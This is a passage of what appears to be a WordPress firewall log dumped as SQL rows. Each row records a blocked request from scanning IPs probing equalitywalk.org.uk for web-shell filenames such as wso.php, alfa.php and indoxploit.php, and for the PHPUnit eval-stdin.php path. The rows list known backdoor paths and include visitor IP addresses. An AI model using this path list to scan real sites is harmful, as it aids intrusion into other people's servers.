Safari\\/537.36\",\"2\":\"www.bing.com\"}','2MUlCXefkdgaLtw8JxSbK174',0,1674063199.3572,148,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','MjtkgNLTey12mQif7vY3Gs8x',0,1674063224.8664,140,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','Rvsf2CB47rznS1iJTZMgo5tU',0,1674063297.1989,166,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','B2ov7mTCJMLifcSWnV8p34Gx',0,1674063326.2480,230,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','gP9FY2Jy7VMOetuaQ8ipUNnC',0,1674063326.6396,142,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','v7wSMtEZ10moPTXuAY2gIHnb',0,1674063341.4887,105,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/css.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','dZUXFjciGPveKL5AY1smBJOQ',0,1674063358.1228,117,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','jYpskIWgXSClGNcy4M6J1e3F',0,1674063363.4053,133,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-booking.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','cR9kDTqJNrlFKXfVeizA8BU7',0,1674063372.2963,105,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/config.bak.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','OxRiQy3hUuW5GZbDt01MzJdn',0,1674063408.6252,109,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/legion.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','9NEZx54L6JaMYQPKlOVqdgF2',0,1674063414.1460,102,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-plugins.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','1KaLNkW0eH7VXYE2g5Pz4nwJ',0,1674063418.2818,121,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/gank.php.PhP','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','cJwlZvCoYRS02KDeuWfVi6zA',0,1674063421.4303,106,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ERlkoPX0bS9QmrDn7AtpiLCT',0,1674063424.5625,155,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/xindex.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','lbQxquKo5aIcWC6dXATDp9sE',0,1674063430.9473,107,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','yKDLXWxOIeq6lwagdt1TEAkY',0,1674063435.3047,138,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/system_log.php?bala=up','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','blJ7ZSGaF4KOecBzqAywRDpV',0,1674063452.9369,116,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp-backup-sql-302.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','85lXvSDf9cgHzmYuIMAahGQ2',0,1674063454.0718,89,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/error.php?phpshells','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','y6SN5dsR37OgQ4vkelUp1miC',0,1674063455.7581,99,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/index.php?3x=3x','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','CI5LF0B9tGH8nbwuW3eS1ZRQ',0,1674063481.9078,104,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/about.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','KVvN48HZI67DuUBJ0b2qoh9x',0,1674063482.3214,174,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/shells.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','auw8fX2vmjh0NVWO9SqdKRne',0,1674063482.8802,156,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/olux.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','jcdMrKRqwnhyBLpCU2bu37ZQ',0,1674063483.4140,126,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/xleet.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','1hJgqYVluPxmej76UHni2Qfz',0,1674063483.9668,106,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wso.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','7O0ZgxwtYiFCPEfqzyDA4v2d',0,1674063484.7609,114,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/shell.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','mk3qwODMgX1Rd2GfHQCUbhY6',0,1674063485.5046,120,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/up.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','bvc8XdqDz7YsQMpVGkHNPoKj',0,1674063486.3219,112,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/upload.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','2xBDItdEnAFMVUQg3PRC7bqp',0,1674063486.6022,160,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/1.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','VBr6pclkNZ72bdyHvSCOtzIn',0,1674063487.2217,150,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/x.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','hGmtPn5icrYEDCQ0J71RFsMA',0,1674063487.4897,110,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/z.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Af07WJoKxhXH5QUe9NBrgizu',0,1674063487.7761,97,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/a.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','uoEvx8zDP9m6n4iF1UhOsyrb',0,1674063488.0660,127,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/test.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Rb3hzpfZFcUT5dgIQlBA0Jv9',0,1674063488.7321,115,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/wp.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','OXCeQ2uidfF4pYImv78zw6h9',0,1674063489.0223,113,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/alfa.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','QD7wr4sO58UxE6VbJp1Go0Sl',0,1674063489.3326,109,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/config.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','JUqMat0nG51cAsQwKkof8bTW',0,1674063489.6918,100,'','GET',403,0,700,0,1,'',0),('185.190.24.90',3116243034,'','https://equalitywalk.org.uk/templates/beez3/index.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','VbA3hXuUwdayFTp8znSK2f7Y',0,1674063489.9028,89,'','GET',403,0,700,0,1,'',0),('147.78.47.230',2471374822,'','https://equalitywalk.org.uk/wp-comments.php?pw=AsAjfkel!@&path=wp-test','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.82 Safari\\/537.36\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-comments.php?pw=AsAjfkel!@&path=wp-test\"}','Hrsz21W5AgKXUtf4yl6EOkLF',0,1674064666.2705,103,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.27.1\"}','BTbKloZ6Vc50q2RydwYPvfFS',0,1674073500.3869,150,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','RqBdC4WVKtvrg83fhZpEUHPT',0,1674075666.0698,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-admin/style.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Jw9364KDpteWFbGCXOrkScaf',0,1674075666.4547,113,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/s_e.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','jVPRkZaeUpMCBT3nX5mhAt0W',0,1674075667.3975,132,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/s_ne.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','f0Haun7wvO8pj56dkQzJCAt1',0,1674075668.3818,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','sd0jhNA85M4oyEfemiWSYXqx',0,1674075670.8035,103,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/radio.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','kEjuOcxCZIaUTD79sb83mvVY',0,1674075671.9541,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/doc.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','Un41x0Jza7OfQI2CKwlokLtq',0,1674075672.8623,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','xA3h1WPn5lv9KJwFVfpsMjXY',0,1674075673.7604,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/beence.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','gksa01ZtPiOvUAdNhHrfJqYp',0,1674075674.7168,108,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ups.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','EFRUjlJ7cfOY6WB2kG5d8nK3',0,1674075675.8132,103,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-signin.php?dizo&ping','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','iUDO06LVt9MIbGTykpBvlr3e',0,1674075677.1358,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/media-admin.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','D8hQLcus4vG36aByo7f1kpJx',0,1674075678.3623,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/export.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','u82pjdK79UXoG0nvDBwbIxVs',0,1674075679.4734,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-includes/wp-class.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','iWuYnexO6tC9dKU1jJGNarDg',0,1674075680.6519,122,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-includes/wp-atom.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','IRENtxYi8vUCMZrnf0o1zTFP',0,1674075681.8028,129,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','cWX5LIgCAK86UMosVGJmRv43',0,1674075682.7780,84,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','MGCEH6Wea8vkR23AXKU1B4Pj',0,1674075683.1476,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','SJxdgfCowvjtNsl02yac7hEG',0,1674075684.0395,129,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ufao6AD7Br0qJlWUdMxt2jpF',0,1674075684.9977,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-booking.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','G1E9Xj6yFbdgth0mxHLalS5Y',0,1674075685.9183,114,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/config.bak.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','fSZvUJoLdiu84MVXbDB9xKeH',0,1674075689.3047,99,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/legion.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','W1bIRSFnrMK643eU5jltaxD0',0,1674075690.6353,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-plugins.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','RUN3X9Bp6COxSQtHwKZLik1W',0,1674075692.6425,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/gank.php.PhP','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','TzfRi30SmvK97joQEHDgcMwl',0,1674075693.9530,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','R69r4fHFabCoTM8IZxLcPd3q',0,1674075695.6518,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','vJKiCupYlRVFd2z3LbHWwO5G',0,1674075696.5821,151,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/system_log.php?bala=up','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','f1qZkAphL0TMVgW8DmJbwaXj',0,1674075698.4457,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-backup-sql-302.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','HbozZI6A9jRXnVqJtgarpyFL',0,1674075699.3866,107,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/error.php?phpshells','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','7ZcHbOPyto40N5fvjnwk2VaI',0,1674075700.2965,82,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/index.php?3x=3x','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','UQP28zvCY0X1sbFxlS56cg7i',0,1674075741.5631,116,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','aVyZDo4hC3e0EPizdWwQmHjv',0,1674075742.0045,87,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xleet.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','mdL1UjF9qsX4YR6NVDWyzeQ7',0,1674075742.3741,111,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','U9flWGu1qtVKwgvrPHTNhbB5',0,1674075742.7625,108,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','z7ThMZ2vxHVyalGPobnNjXWR',0,1674075743.1593,85,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','FbjX9pR43o7KmW6Afek1CEzJ',0,1674075743.5355,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','zwPtpA17cF0INEQiaXO289Jb',0,1674075743.8932,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/1.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','sjNwk3yrUoefnY7aL5RlGPFx',0,1674075744.2825,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/x.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','iJx906OPWGjyuXwnFVf4TUaM',0,1674075744.6397,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/z.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','CEw17R6PVILKZizWkle4YpTG',0,1674075745.0276,84,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','mjqeQu0sx6iEWnMPY3wf7Kdg',0,1674075745.3888,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/test.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','XCYe1DUZvJ3utlyrTBoEsVRi',0,1674075745.7621,111,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','CQAGIic7ylg6jUSLdZJeWxDh',0,1674075746.1751,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfa.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','HQgOcfwdmZVKC1Tu2tEyDU0J',0,1674075746.6050,100,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/config.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','UPVlX8kMnzE6CKc1HrYwoR0p',0,1674075747.0113,266,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/templates/beez3/index.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','DMVoScKgFms9hRkUpECB0u24',0,1674075747.5821,125,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','G0FmYHf46Txh3igcW9bQLAso',0,1674075748.0125,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/shells.php','','{\"1\":\"wp_is_mobile\",\"2\":\"www.bing.com\"}','AWnex0DwRo68abU14KvXkuF2',0,1674075748.3963,82,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.27.1\"}','Zlrq50tosATeS82G6JVYdOQm',0,1674076522.4502,117,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wso.php','','{\"1\":\"python-requests\\/2.27.1\"}','H3YUgIt8VFQm421RvMyNpqf7',0,1674076524.0261,98,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.27.1\"}','OtKnU05B7rCzluc6JhbdYWgv',0,1674076532.3654,195,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/olux.php','','{\"1\":\"python-requests\\/2.27.1\"}','GrO817cKXhLUSg6FYjiQeZdH',0,1674076534.2199,105,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.27.1\"}','4sEqGa5MXkV2uwdemD0lWQjF',0,1674076535.6962,97,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/up.php','','{\"1\":\"python-requests\\/2.27.1\"}','v8xLu9K1k2tUF6sVdRDnwCTc',0,1674076538.6455,133,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"python-requests\\/2.27.1\"}','vn6odCV8JUSz5FO0g7XQfMIR',0,1674076540.1317,98,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/shell.php','','{\"1\":\"python-requests\\/2.27.1\"}','hoFHPK6uNyVs51XLZqbnRdfc',0,1674076557.1201,122,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.27.1\"}','dHNawBXQC8xvKhJS34Gc71yq',0,1674076558.4149,106,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/wp-info.php','','{\"1\":\"python-requests\\/2.27.1\"}','Z9n4dzjgYADHlcaLouF5RETG',0,1674076559.6528,91,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/upel.php','','{\"1\":\"python-requests\\/2.27.1\"}','y0Oi6Z8sjKTdWvAJz5YLkwqF',0,1674076563.4436,97,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/098.php','','{\"1\":\"python-requests\\/2.27.1\"}','OVQFwZcA9ylUPmhdJpeKoTgt',0,1674076565.6841,104,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"python-requests\\/2.27.1\"}','y6xhplRGVZ8NHmLTSa0wIXqM',0,1674076566.9468,93,'','GET',403,0,700,0,1,'',0),('208.109.33.169',3496812969,'','https://www.equalitywalk.org.uk/new_license.php','','{\"1\":\"python-requests\\/2.27.1\"}','mUD1FxMjs7QBSXJanGOcKhqv',0,1674076568.2540,91,'','GET',403,0,700,0,1,'',0),('109.248.175.119',1845014391,'','https://www.equalitywalk.org.uk/wso112233.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\"}','uHGXWaejb1vsxL0AEgQFdYmh',0,1674082281.8693,830,'','GET',403,0,700,0,1,'',0),('131.226.2.16',2212626960,'','https://www.equalitywalk.org.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"python-requests\\/2.28.1\"}','MKVSJH7T5CN8skEl2rpgqUDw',0,1674083551.7354,723,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/about.php','','{\"1\":\"python-requests\\/2.26.0\"}','cx5UpnyR7Z4Xq1Yb0mCLiPO2',0,1674085549.3841,633,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/3index.php','','{\"1\":\"python-requests\\/2.26.0\"}','VgvQyG1kS4PxWCUbIDM0j9s6',0,1674085550.7838,677,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/2index.php','','{\"1\":\"python-requests\\/2.26.0\"}','93shFdb4zxujyKJSLPgA6lfe',0,1674085552.2343,584,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/C.php','','{\"1\":\"python-requests\\/2.26.0\"}','5TPoSpBfQYV8EKHDJRke6uXy',0,1674085553.6145,824,'','GET',403,0,700,0,1,'',0),('173.255.223.188',2919227324,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"python-requests\\/2.26.0\"}','vcdazTkf75JbyWHO3mUp4gV8',0,1674085555.2388,644,'','GET',403,0,700,0,